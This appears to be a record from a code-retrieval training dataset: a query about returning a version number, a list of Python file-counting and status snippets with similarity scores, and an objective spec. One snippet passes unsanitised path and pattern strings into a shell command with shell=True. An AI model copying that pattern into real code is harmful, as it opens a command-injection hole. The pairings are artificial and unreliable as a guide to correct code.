isfile(join(self.file_location,f)) ]\n return look4files", "def import_directory(self, directory):\n files_list = sys_utils.get_files_from_directory(directory)\n if files_list == None:\n return None, 0\n oids = []\n num_new_files = 0\n p = progress.progress(len(files_list))\n for file_location in files_list:\n oid, new_file = self.import_file(file_location)\n p.tick()\n if oid:\n oids.append(oid)\n if new_file:\n num_new_files += 1\n oids = list(set(oids)) # assert uniqueness \n return oids, num_new_files", "def _get_files(self):\n # pylint: disable=unused-variable\n for dirpath, __, filenames in os.walk(self.start_location):\n for file_ in filenames:\n if file_.endswith('.py'):\n yield \"{0}{1}\".format(dirpath, file_)", "def _get_base_files(self):\n setup_file = path.join(self.PyCogentDirectory, 'setup.py')\n #reqs_file = path.join(self.PyCogentDirectory, 'cogent-requirements.txt')\n #return [(setup_file, 'Python'), (reqs_file, 'Properties')]\n return [(setup_file, 'Python')]", "def get_nb_files(directory):\r\n if not os.path.exists(directory):\r\n return 0\r\n cnt = 0\r\n for r, dirs, files in os.walk(directory):\r\n for dr in dirs:\r\n cnt += len(glob.glob(os.path.join(r, dr + \"/*\"))) # glob模块是用来查找匹配文件的,后面接匹配规则。\r\n return cnt", "def file_stat(self, file_path):", "def main():\n results = []\n results.extend(check_mounts())\n results.extend(diskusage())\n return results", "def get_number_of_files(directory: str):\n\n number_of_files = len([item for item in os.listdir(directory) if os.path.isfile(os.path.join(directory, item))])\n print(number_of_files)\n return number_of_files", "def getNFiles(self, config, base, logger=None):\n if 'nfiles' in config:\n return galsim.config.ParseValue(config, 'nfiles', base, int)[0]\n else:\n return 189", "def get_info(self):\n if os.path.isfile(self.path):\n total_size = os.path.getsize(self.path)\n total_files = 1\n elif os.path.exists(self.path):\n total_size = 0\n total_files = 0\n for x in os.walk(self.path):\n for fn in x[2]:\n fpath = os.path.normpath(os.path.join(x[0], fn))\n rel_path = os.path.relpath(fpath, self.path)\n if any(fnmatch.fnmatch(rel_path, ext) for ext in self.exclude):\n continue\n fsize = os.path.getsize(fpath)\n if fsize and not is_hidden_file(fpath):\n total_size += fsize\n total_files += 1\n else:\n raise exceptions.InvalidInputException\n if not (total_files and total_size):\n raise exceptions.EmptyInputException\n if self.piece_size:\n ps = self.piece_size\n else:\n ps = 1 << max(0, math.ceil(math.log(total_size / 1500, 2)))\n if ps < MIN_PIECE_SIZE:\n ps = MIN_PIECE_SIZE\n if ps > MAX_PIECE_SIZE:\n ps = MAX_PIECE_SIZE\n return (total_size, total_files, ps, math.ceil(total_size / ps))", "def get_testing_data(self):\n\n print 'Loading testing data ', self.test_folder , '...'\n test_text = []\n cnt = 0\n\n for f in listdir(self.test_folder):\n file_path = join(self.test_folder, f)\n if isfile(file_path):\n cnt += 1\n if cnt % 10000 == 0:\n print 'finished:', cnt # line counter\n self.test_index.append(f[:-4])\n with open(file_path, 'rb') as f:\n test_text.append( f.read() )\n\n return test_text", "def perform_calculations():\n # contains the result of the total repositories\n result = [] \n count_all_lines = 0 # mainatains the line that has been counted\n for_loops_list = []\n func_parameters = [] # function parameter checks list\n no_of_variables = set() # a set containing variables\n docs_comments = [] \n single_line_comments = []\n code_duplication = 0\n repo_imports_set = set() # imports for the entire repo\n current_repo = ''\n for item in traverse_repos():\n current_repo = item['repo_url']\n for path in item['files']:\n with open(path, 'r') as file_:\n lines = file_.readlines()\n # call code duplication\n code_duplication += code_duplication_check(lines)\n for line in lines:\n if re.match(r'^#.+', line.strip()):\n single_line_comments.append(line.strip())\n # this makes it possible to campare later\n # call find_repo_imports\n line_import = find_repo_imports(line)\n \n repo_imports_set.add(line_import)\n # call countlines of code function\n count_all_lines += count_lines_of_code(line.strip())\n # call find_for_loops\n for_loops = find_for_loops(line)\n if for_loops:\n for_loops_list.append(for_loops)\n function = avarage_parameters(line)\n if function:\n func_parameters.append(avarage_parameters(line))\n no_of_variables.add(avarage_variables_per_line(line))\n\n with open(path, 'r') as content_file:\n content = content_file.read()\n docs_comments.extend(find_docstrings_and_comments(content, single_line_comments))\n \n \n\n external_packages = find_external_packages(repo_imports_set)\n repo_lines_of_codes = count_all_lines - len(docs_comments)\n avarage_variables_repo = (len(no_of_variables)-1) / repo_lines_of_codes\n nesting = nesting_depth(for_loops_list) / len(for_loops_list)\n avarage_params = sum(func_parameters) / len(func_parameters)\n repo_result = {\n 'repository_url': current_repo, \n 'number of lines': repo_lines_of_codes, \n 'libraries': external_packages,\n 'nesting factor': nesting,\n 'code duplication': code_duplication,\n 'average parameters': avarage_params,\n 'average variables': avarage_variables_repo\n \n }\n result.append(repo_result)\n\n return result", "def summarize(path: str) -> dict:\n results = parse_bactopia_directory(path)", "def read_file_names(self):\n files_BIDMC = os.listdir(self.root_dir_BIDMC)\n masks_BIDMC = os.listdir(self.seg_dir_BIDMC)\n files_HK = os.listdir(self.root_dir_HK)\n masks_HK = os.listdir(self.seg_dir_HK)\n files_I2CVB = os.listdir(self.root_dir_I2CVB)\n masks_I2CVB = os.listdir(self.seg_dir_I2CVB)\n files_ISBI = os.listdir(self.root_dir_ISBI)\n masks_ISBI = os.listdir(self.seg_dir_ISBI)\n files_ISBI_15 = os.listdir(self.root_dir_ISBI_15)\n masks_ISBI_15 = os.listdir(self.seg_dir_ISBI_15)\n files_UCL = os.listdir(self.root_dir_UCL)\n masks_UCL = os.listdir(self.seg_dir_UCL)\n site_files = [files_BIDMC, files_HK, files_I2CVB, files_ISBI, files_ISBI_15, files_UCL]\n site_masks = [masks_BIDMC, masks_HK, masks_I2CVB, masks_ISBI, masks_ISBI_15, masks_UCL]\n return site_files, site_masks", "def compute_code():\n for file in os.listdir('./src/Templates'):\n input.parse_template('./src/Templates/' + file, './student/' + file + '.py')\n data = input.load_input()\n return len([k for k in data['input'].keys() if '@' not in k])", "def lookup_ifproc_file(obsnum, path='/data_lmt/ifproc/', debug=False):\n paths = [path]\n\n if 'ifproc' not in path:\n paths += ['/data_lmt/ifproc/']\n if 'lmtttpm' not in path:\n paths += ['/data_lmt/lmttpm/']\n if 'tel' not in path:\n paths += ['/data_lmt/tel/']\n\n if debug:\n print(paths)\n\n for path in paths:\n filenames = glob.glob(os.path.join(path, '*_%06d_*.nc' % obsnum))\n if len(filenames) > 0:\n if debug:\n print('found %s' % (filenames[0]))\n return filenames[0]\n return ''\n #filename = ''\n #for file in os.listdir(path):\n # if fnmatch.fnmatch(file,'*_%06d_*.nc'%(obsnum)):\n # print('found %s'%(file))\n # filename = path+file\n #if filename == '':\n #print('lookup_ifproc_file: no file for obsnum ', obsnum)\n #if 'lmttpm' not in path:\n # print('look in lmttpm')\n # return lookup_ifproc_file(obsnum,path='/data_lmt/lmttpm/')\n #return(filename)", "def calculate(d):\r\n\r\n # Set correct slashes for the OS\r\n if sys.platform == 'windows':\r\n slash = '\\\\'\r\n elif sys.platform == 'linux':\r\n slash = '/'\r\n else:\r\n print('#Error. Unknown platform.')\r\n return\r\n\r\n print('Files in the current directory and their md5-hashes:\\n')\r\n i = 0\r\n assert i == 0, '#Error. Variable i != 0.'\r\n\r\n for i in range(len(d[2])): # Go through the list of files\r\n full_path = d[0]+slash+d[2][i]\r\n print(full_path) # Get the list of files with full paths\r\n print(md5(full_path))\r\n size(full_path)", "def find_data(self):\n data_list = []\n for root, dirs, files in os.walk(pathfinder.data_path()):\n for name in files:\n data_list.append(os.path.join(root, name))\n return data_list", "def count_files_dir(self,full_path):\n try:\n num_files = len([name for name in os.listdir(full_path) if os.path.isfile(self.FILENAME)])\n print(f\"Number of files in {full_path} is {num_files}\")\n return num_files\n except Exception as e:\n raise SystemExit(f\"Could not complete operation: {e}\")", "def read_inputs(self):\n curdir = os.getcwd()\n os.chdir(self.fst_dir)\n rstat = self.readFST()\n if rstat == 0:\n os.chdir(curdir)\n return 0\n # the names of the next files are either set by caller or come from the reading the FAST file\n rstat = self.readNoise()\n rstat = self.readAD()\n rstat = self.readBlade()\n rstat = self.readPtfm()\n os.chdir(curdir)", "def getAllVCFs(inputFolder):\n listOfFiles = []\n numErrors = 0\n for folder in os.listdir(inputFolder): #Loop through all folders\n # print(folder)\n try: # using a try-xcept block to avoid errors with other files \n # not following this structure\n # TODO: make this cleaner\n vcfLoc = os.path.join(inputFolder, os.path.join(folder, \"pilon/\"))\n # print(vcfLoc)\n for potentialFile in os.listdir(vcfLoc):\n # print(potentialFile)\n if(potentialFile.endswith(\".vcf.gz\")):\n listOfFiles.append(os.path.join(vcfLoc, potentialFile))\n except:\n # print(\"error at \" + folder)\n numErrors += 1\n print(numErrors)\n return listOfFiles", "def _checkpoint_numbers(cls, checkpoints_dir):\n dirs = [d for d in listdir(checkpoints_dir) if d.endswith('.checkpoint')]\n return sorted([int(d[:-11]) for d in dirs])", "def get_amount_by_file(path):\n if os.stat(path).st_size == 0:\n raise Exception\n with open(path, 'r') as file:\n items = file.read().split(',')\n total = reduce(lambda x, y: int(x) + int(y), items)\n return total", "def readNSRelaxFiles(folder_path):\n\n run_arr = []\n Nrun_arr = []\n dod_arr = []\n crate_arr = []\n count=0\n\n # find number of files that starts with run\n # (this is the data file we want to read)\n for file in os.listdir(folder_path):\n if file.startswith(\"relaxrun\"):\n count+=1\n\n # order the data files by run number, so we get descending crates\n Nrun=1\n for i in range(count+5):\n for file in os.listdir(folder_path):\n if file.startswith(\"relaxrun_\"+str(Nrun)+\"_\"):\n run_arr.append(file)\n dod = re.search('dod=(.*).txt', file).group(1)\n crate = re.search('Crate=(.*)_',file).group(1)\n Nrun_arr.append(np.round(int(Nrun),decimals=0))\n dod_arr.append(float(dod))\n crate_arr.append(float(crate))\n Nrun+=1\n print(len(run_arr))\n\n return run_arr, Nrun_arr, dod_arr, crate_arr", "def _determine_local_import_names(start_dir):\n file_ext_pairs = [os.path.splitext(path) for path in os.listdir(start_dir)]\n return [\n basename\n for basename, extension\n in file_ext_pairs\n if extension == '.py' or os.path.isdir(\n os.path.join(start_dir, basename))\n and basename not in ('__pycache__')]", "def get_results_labels(dir_path):\n dx = 0\n directories = [dI for dI in os.listdir(dir_path)\n if os.path.isdir(os.path.join(dir_path, dI))]\n results = []\n\n for directory in directories:\n # collect the path to all results files\n path = os.path.join(dir_path, directory)\n files = [os.path.join(path, f) for f in os.listdir(path)\n if os.path.isfile(os.path.join(path, f))\n and 'results' in f]\n\n # if the directory does not have results files, move on to the next\n if len(files) == 0:\n continue\n\n # collect the average cumulative returns per training iteration\n res = []\n lengths = []\n for i, f in enumerate(files):\n data = pd.read_csv(f)\n if i == 0:\n dx = data['total/steps'][2] - data['total/steps'][1]\n res.append(data['rollout/return_history'])\n lengths.append(len(data['rollout/return_history']))\n\n res = [[r[:min(lengths)]] for r in res]\n results.append(np.concatenate(res, axis=0))\n\n return results, directories, dx", "def get_python_files(all_files=None):\n if all_files is None:\n all_files = ci_diff_helper.get_checked_in_files()\n\n production_files = []\n test_files = []\n for filename in all_files:\n if not valid_filename(filename):\n continue\n if is_test_filename(filename):\n test_files.append(filename)\n else:\n production_files.append(filename)\n\n return production_files, test_files", "def reportinfo(self):\n return super().reportinfo()[:2] + (self.fspath.relto(os.getcwd()),)", "def count_dirs_and_files(directory='.'):\n pass", "def ttl_files_in_dir(dir_path, pat='.'):\n if not path.isdir(dir_path):\n raise NotADirectoryError\n\n # In a subprocess, count list the files in the dir and count them, convert output to an int\n ttl = int(check_output('ls -A -U --color=never {} | grep {} | wc -l'.format(dir_path, pat), shell=True).strip())\n\n return ttl", "def count(train_dir):\r\n path = train_dir\r\n count = 0\r\n for fn in os.listdir(path): #fn 表示的是文件名\r\n count = count + 1\r\n return count", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number" ]
[ "0.6993405", "0.6395879", "0.614925", "0.5898231", "0.57934844", "0.5683392", "0.56749487", "0.56739736", "0.56560665", "0.559616", "0.55468976", "0.5527279", "0.55094504", "0.5491219", "0.54559195", "0.5373519", "0.5360052", "0.53304", "0.5296416", "0.5291369", "0.5234145", "0.52289695", "0.52206385", "0.51996464", "0.51954573", "0.5185844", "0.51648813", "0.5164462", "0.5134597", "0.512213", "0.51164156", "0.5109861", "0.5107807", "0.5084028", "0.5082196", "0.5081326", "0.5079591", "0.5077953", "0.50771743", "0.5071418", "0.50705975", "0.50595474", "0.5058926", "0.505754", "0.50533324", "0.50512177", "0.5047785", "0.50470525", "0.5042362", "0.5040497", "0.5040322", "0.5037387", "0.50322455", "0.50297064", "0.50276005", "0.500657", "0.50051033", "0.5001271", "0.49973717", "0.4996412", "0.4988866", "0.49884328", "0.49881095", "0.4988084", "0.4985919", "0.4985775", "0.49802762", "0.49781474", "0.49727693", "0.49710363", "0.4970427", "0.4967399", "0.49543992", "0.49536684", "0.49421307", "0.49418175", "0.4932748", "0.49326763", "0.4925025", "0.4924283", "0.49241623", "0.4922814", "0.49208128", "0.49176306", "0.49172363", "0.49107918", "0.4906243", "0.49041766", "0.49032098", "0.4887595", "0.4887065", "0.4885747", "0.48812976", "0.48807985", "0.48778835", "0.48746076", "0.4872828", "0.48676902", "0.4861506", "0.48572385", "0.4850339" ]
0.0
-1
Just return the version number
def _sendVersion_result (self, (code, data)) : assert code == "REPLY_HELLO" return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def version_number() -> int:\n return 0", "def get_version():\n return '%d.%d.%d' % version_info", "def get_version():\n return 1", "def get_version(self):\r\n\r\n return self.versions[0].number", "def version(self):\n a = re.search('(?<=_V)\\d{1,2}', self.fname)\n if a is None:\n return None\n else:\n return int(a.group())", "def version(self):\n _, body = self.request('/', 'GET')\n return body.get('version', None)", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def get_version(self):\n return 0", "def get_version():\n click.echo(get_current_version_number())", "def _get_version(self):", "def get_version(self) -> str:\n return versioning.get_version()", "def get_version(self):\n pass", "def getVersion(self):\n return self.get('Version', type=\"numeric\")", "def get_version(self):\n return self.version", "def get_version():\r\n return __version__", "def version(self):\n return \"%d.%d\" % (self._vmajor, self._vminor)", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_version():\n return about.get_version()", "def get_version(self):\n return self.__make_api_call('get/version')", "def version(self):\n self.version_list[-1] = self.revision\n version = '.'.join(self.version_list)\n return version", "def version_number(path: str) -> str:\n exp = r'__version__[ ]*=[ ]*[\"|\\']([\\d]+\\.[\\d]+\\.[\\d]+[\\.dev[\\d]*]?)[\"|\\']'\n version_re = re.compile(exp)\n\n with open(path, 'r') as fqe_version:\n version = version_re.search(fqe_version.read()).group(1)\n\n return version", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def version(self):\n return self._get(\"version\")", "def Version(self) -> _n_0_t_12:", "def Version(self) -> _n_0_t_12:", "def version():\n\n version = None\n output = gitopen(['--version'])\n m = re.search(br\" version ([\\d\\.A-Za-z]+)\", output)\n if m is not None:\n version = m.group(1).decode('utf-8')\n return version", "def version(self) -> Union[int, str]:", "def versionstring():\n return \"%i.%i.%i\" % __version__", "def versionstring():\n return \"%i.%i.%i\" % __version__", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def version(self) -> Optional[str]:\n return pulumi.get(self, \"version\")", "def get_version(self):\n return self._version", "def get_version(self):\n return self._version", "def get_version() -> str:\n return __version__", "def get_version_number():\n return [0, 1, 0]", "def version():\n return __VERSION__", "def getversion(self):\n return self.__version", "def version():\n return '%d.%d' % (sys.version_info[0], sys.version_info[1])", "def Hello(self):\n version = '1.5.3'\n print 'returned version number', version\n return version", "def get_version(self, params):\n return self.version", "def _get_version(self):\n if _cbc_version is None:\n return _extract_version('')\n return _cbc_version", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def get_version():\n return '.'.join(map(str, VERSION))", "def version(self):\r\n return self.version_guid", "def version():\n return uname().version", "def version():\n return uname().version", "def version():\n\n pass", "def getVersion():\n try:\n fh=open(version_py, 'r')\n version=fh.read().strip().split('=')[-1].replace(\"'\",'').lstrip()\n fh.close()\n except:\n return None\n\n return version", "def version():\n\n print(VERSION_CODE)", "def _GetVersion(version_str):\n return int(version_str.split('.')[1])", "async def version(self):\n self.do(\"version\")\n return (await self.read(7)).strip()", "def version(self):\n if not self._version:\n self._version = self._get_version()\n\n return self._version", "def get_major_version(version):\n return str(check_version(version)[0])", "def get_version():\n\n with open('u2fval/__init__.py', 'r') as f:\n match = VERSION_PATTERN.search(f.read())\n return match.group(1)", "def version(self):\n self._get_latest_content()\n return self._data.get('version', None)", "def get_version(self):\n article_url = self.env[\"article_url\"]\n title = self.get_html_title(article_url)\n regex = r\"(?:(\\d+)\\.)?(?:(\\d+)\\.)?(\\*|\\d+)\"\n match = re.search(regex, title)\n if match:\n version = match.group(0)\n self.output(\"Version: {version}\".format(version=match.group(0)), 2)\n return version\n else:\n raise ProcessorError(\"Unable to determine version.\")", "def version_number(version_str):\n raise NotImplementedError", "def get_version(self):\n return version.__version__", "def get_version(self):\n return version.__version__", "def get_version():\n return magpy.get_version()", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['orionld version']\n except Exception as e:\n pass\n return ''", "def default_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"default_version_number\")", "def version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"version\")", "def version_min():\n return VERSION_MIN", "def version(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"version\")", "def version(self) -> str:\n return pulumi.get(self, \"version\")", "def version(self) -> str:\n return pulumi.get(self, \"version\")", "def version(self) -> str:\n return pulumi.get(self, \"version\")", "def version(self) -> str:\n return pulumi.get(self, \"version\")", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def version(self) -> int:\n return self._version", "def do_version(self):\n return \"1.0.0\", True", "def GetVersion(self):\n return self._SendRequest(HTTP_GET, \"/version\", None, None)", "def get_version(self):\n url = '{}/v2/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def get_version_tag(self, version: str) -> str:\n return version", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "async def version(self) -> str:\n response = await self._request(\"status\")\n return response[\"version\"]", "def get_revision(self):\n vers = self.send(\"?R\", recv=True)\n # Verify its a valid version\n # ? why was this commented out\n float(vers)\n # But return as string to avoid precision issues\n return vers", "def get_version() -> str:\n version = read(\"pdf_utils/__version__.py\")\n return re.search(r\"__version__ = \\\"(.*?)\\\"\", version).group(1)", "def get_uni_version(self):\n version, major_version = None, None\n response = self.get_resource(category=VERSION, no_version=True)\n if response and response.get('version'):\n version = response['version']\n version_list = version.split('.')\n major_version = version_list[0][1:] + version_list[1]\n return version, major_version", "def build_version(self):\n return self.nodes[0].get('infos').get('system_info').get('system_version')", "def get(self):\n return self._version", "def version():\n cmd = \"{} -v\".format(_detect_os())\n out = __salt__[\"cmd.run\"](cmd).splitlines()\n ret = out[0].split(\": \")\n return ret[1]", "def version(self):\n if \"version\" in self._prop_dict:\n return self._prop_dict[\"version\"]\n else:\n return None", "def get_version(self):\n return self.cur_config['version']['name']", "def getversion(): # 3\n res,resargs = _msk.Env.getversion()\n if res != 0:\n raise Error(rescode(res),\"\")\n _major_return_value,_minor_return_value,_build_return_value,_revision_return_value = resargs\n return _major_return_value,_minor_return_value,_build_return_value,_revision_return_value", "def get_version_special(name):\n\n module = import_module(name)\n if module:\n return module.version.VERSION\n else:\n return \"NA\"", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def version(self):", "def major_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"major_version\")", "def version(self): # -> string\n try:\n return gtts.version.__version__\n except (AttributeError, NameError):\n self.ok = False\n return \"\"", "def version(self) -> str:\n data = \"none yet\"\n if self.STARTED:\n data = (\n self.about.get(\"Version\")\n or self.about.get(\"Installed Version\")\n or \"DEMO\"\n )\n data = data.replace(\"_\", \".\")\n return data", "def version_info():\r\n return tuple(map(int, __version__.split('.')))", "def version_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"version_id\")", "def get_version():\n\n with open('__init__.py') as f:\n for line in f.readlines():\n if '__version__' in line:\n apicem_version = line.strip().split(\"=\")[-1].strip(\" '\")\n if '__first_release_date__' in line:\n first_release_data_str = line.strip().split(\"=\")[-1].strip(\" '\")\n first_release_data = date(*[int(num) for num in first_release_data_str.split('.')])\n num_commits = get_cr_num(first_release_data)\n return '{apicem_version}.{num_commits}'.format(\n apicem_version=apicem_version, num_commits=num_commits)\n\n raise ValueError(\"could not read version\")", "def get_version(self):\n return self.api_version" ]
[ "0.8984848", "0.8674616", "0.83636147", "0.82080185", "0.81788445", "0.8116403", "0.81144017", "0.81124747", "0.8100697", "0.79934955", "0.79558516", "0.79138756", "0.790076", "0.78910106", "0.7832687", "0.7817467", "0.7802331", "0.7774403", "0.77695936", "0.77678406", "0.7761813", "0.7759757", "0.7759757", "0.7759757", "0.7743857", "0.77416784", "0.77416784", "0.77333814", "0.77295023", "0.77253145", "0.77253145", "0.770664", "0.770664", "0.770664", "0.770664", "0.770664", "0.77026904", "0.77026904", "0.76987904", "0.76900977", "0.7685675", "0.76807165", "0.7656677", "0.76563025", "0.7642019", "0.7635513", "0.76341605", "0.7613763", "0.7609877", "0.7595134", "0.7595134", "0.75860864", "0.75796926", "0.7563893", "0.7555708", "0.75490767", "0.7547525", "0.7541454", "0.75402254", "0.75389177", "0.7534869", "0.75305665", "0.75195247", "0.75195247", "0.7516664", "0.7503185", "0.750011", "0.7498429", "0.7498157", "0.7497113", "0.74946505", "0.74946505", "0.74946505", "0.74946505", "0.7489129", "0.7487392", "0.7486265", "0.74846685", "0.7483924", "0.74755365", "0.74751186", "0.7470983", "0.74702525", "0.7464067", "0.7460986", "0.7458248", "0.7445424", "0.74390155", "0.7435254", "0.7429707", "0.7425346", "0.7420233", "0.741576", "0.74154985", "0.7413534", "0.74085116", "0.7404157", "0.7403631", "0.7402403", "0.7393508", "0.7389227" ]
0.0
-1
Get the process status
def queryStatus (self) : return self.sendCommand("CMD_IN_QUERY_STATUS", "")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def status( self ):\n duration = datetime.datetime.now() - self.startTime\n status = {\n 'start': self.startTime.isoformat(),\n 'now': datetime.datetime.now().isoformat(),\n 'duration': duration.total_seconds(),\n 'bookmark': 0,\n 'events': 0,\n 'cumulative_rate': 0,\n 'processes': [],\n 'state': {\n 'id': self.state,\n 'description': definitions.STATE_STRING[self.state]\n }\n }\n\n # Sending pipes to processes which are not running or shutting down\n # will lead to errors and deadlocks. Loop through to detect errors.\n if self.state == definitions.STATE_RUNNING:\n # Loop through all processes and just check we're running properly\n for proxy in self.processes:\n if not proxy.process.is_alive():\n self.logger.info( 'Process {0} is dead.'.format( proxy.name ))\n self.state = definitions.STATE_ERROR\n break\n\n if proxy.request( 'status' )['state'] == definitions.STATE_ERROR:\n self.logger.info( 'Process {0} state is {1}.'.format(\n proxy.name,\n definitions.STATE_STRING[ definitions.STATE_ERROR ]\n ))\n\n self.state = definitions.STATE_ERROR\n break\n\n # Now do the actual status checks\n if self.state == definitions.STATE_RUNNING:\n # Loop through processes in order\n for proxy in self.processes:\n response = proxy.request('status')\n\n proc = {\n 'name': proxy.name,\n 'pid': proxy.process.pid,\n 'count': response['count'],\n 'sleep': response['sleep']\n }\n\n status['events'] = proc['count']\n status['processes'].append( proc )\n\n if 'bookmark' in response:\n status['bookmark'] = response['bookmark']\n\n status['cumulative_rate'] = round(\n status['events'] / duration.total_seconds(), 2)\n\n return status", "def _QueryProcessStatus(self, process):\n process_is_alive = process.is_alive()\n if not process_is_alive:\n return None\n\n rpc_client = self._rpc_clients_per_pid.get(process.pid, None)\n return rpc_client.CallFunction()", "def getstatus(self):\n return self.__status", "def status(self):\n import time\n if self._status == 'pending' and PIDWrap.count < PIDWrap.limit:\n self.begin()\n if self._status == 'running':\n ans = os.waitid(os.P_PID, self.pid, os.WEXITED | os.WNOHANG)\n if ans is None: \n if time.time() >= self.killat:\n os.kill(self.pid, 9)\n os.waitpid(self.pid, 0)\n self._status = 'wallclock timeout'\n else:\n self._status = 'running'\n elif ans.si_status == 24: self._status = 'cpu timeout'\n elif ans.si_status != 0: self._status = 'crashed'\n else: self._status = 'finished'\n if self._status != 'running': PIDWrap.count -= 1\n return self._status", "def get_status(self):\n\n return self._system", "def get_running_status(self):\n obj = ProcessInfo('jobs')\n process_list = obj.handle_parameter()\n if process_list:\n # get the hostname\n hostname = process_list[0]\n del process_list[0]\n process_list = obj.extract_process(process_list)\n # print 'dict is here$$$$$'\n dict_processor = []\n for proc_val in process_list:\n if proc_val.search_result ==0:\n dict_processor.append({'processor':proc_val.name,'status':'Stopped','PID':str(proc_val.pid)})\n elif proc_val.search_result >=1:\n dict_processor.append({'processor':proc_val.name,'status':'Running','PID':str(proc_val.pid)})\n # dict_processor[proc_val.name] = 'Running'\n # print (\"|%-20s|%-5s|\"%(proc_val.name,proc_val.search_result))\n # print dict_processor\n return dict_processor\n else:\n return False", "def get_status(self):\n\t\treturn call_sdk_function('PrlJob_GetStatus', self.handle)", "def get_status(self):\n return self.read_register(259, 0, 3)", "def get_status(self) -> bool:\n try:\n self.__driver.service.assert_process_still_running()\n return True\n except AttributeError:\n return False", "def _check_status(self):\n self.system_status_lock.acquire()\n info = self.system_status_proxy._getvalue()\n self.system_status_lock.release()\n return info", "def status(self) -> pulumi.Output['outputs.JobStatus']:\n return pulumi.get(self, \"status\")", "def get_pid_status(pid):\n if pid != 0:\n pid_str = pid\n else:\n pid_str = 'self'\n\n # read procfs /proc/PID/stat file to get PID status\n try:\n with open(\"/proc/{}/stat\".format(pid_str)) as stat_file:\n # split by '(' and ')' needed\n # as processes/threads could have spaces in the name\n line_split = stat_file.readline().strip().split(')')\n pid_name = line_split[0].split('(')[1]\n state = line_split[1].strip().split(' ')[0]\n return state, state in PID_VALID_STATUS, pid_name\n except EnvironmentError:\n pass\n\n return 'E', False, ''", "def getstatus(self):\n status = dict(state=self.getstate(), runningcmd=None,\n current_exposure=self.current_exposure,\n max_exposures=self.max_exposures,\n statustime=str(datetime.now())[:-7],\n lastfile=self.lastfile)\n if self.process:\n status['lastcmd'] = self.process.args[0]\n status['lastreturn'] = self.process.poll()\n if status['state'] == 'running':\n status['runningcmd'] = path.basename(self.process.args[0])\n try:\n with open(self.logfilename, newline='') as logfile:\n ts = datetime.fromtimestamp(path.getmtime(self.logfilename))\n status['cmdoutput'] = f\"Last output: {str(ts)[:-7]}\\n\"\n status['cmdoutput'] += '#'*80+'\\n'\n lines = logfile.readlines()\n if lines and lines[-1][-1] == '\\r':\n lines[-1] = lines[-1][:-1]\n for line in lines:\n if not line.endswith('\\r'):\n status['cmdoutput'] += line\n except FileNotFoundError:\n status['cmdoutput'] = \"\"\n \n # info for the lastimg to update\n status['lastimg'] = self.lastimgpath\n try:\n status['lastimg_timestamp'] = path.getmtime(self.lastimgpath)\n except FileNotFoundError:\n status['lastimg_timestamp'] = 0\n return status", "def get_status(self):\n if self.vm.get_cloud_status() != \"ACTIVE\":\n return \"stopped\"\n #wait for the vm to be ready and SSH-able\n self.vm.wait_ready()\n status = self.vm.run_command(\"ctool status\", indent=0, prefix='')\n return status.strip()", "def getStatus(self):\n return self.__status", "def status(self):\n\t\treturn self._status", "def get_status(self):\n return self._status", "def procs_running():\n \n return __proc_stat('procs_running')", "def mmo_what_process_am_i(self, mmo_connection):\n return mmo_connection[\"admin\"].command(\"serverStatus\")[\"process\"];", "def getStatus(self):\n return self._status", "def _get_status(self):\n return self.__status", "def status(self):\n try:\n res = subprocess.check_output([\n self.get_bin_path(\"pg_ctl\"), 'status', '-D', '{0}'.format(self.data_dir)\n ])\n return True\n except subprocess.CalledProcessError as e:\n if e.returncode == 3:\n # Not Running\n self.working = False\n return False\n elif e.returncode == 4:\n # No data or directory do not exists\n self.working = False\n return None", "def __call__(self):\n status = self.os.popen('circusctl status monitor').read().strip()\n\n if status == 'active':\n return True\n elif status == 'stopped':\n return False", "def status(self):\n self.scion_sh('status')", "def status(self):\r\n return self._status", "def status(self):\r\n return self._status", "def GetStatus(self):\r\n return self.status", "def getstatus(self):\n with self.lock:\n return (self.status, self.time_start)", "def pb_status(self):\n pb = ProcessingBlock(self._pb_id)\n return pb.status", "def status(self):\n return self.__status", "def status(self):\n return self.__status", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, 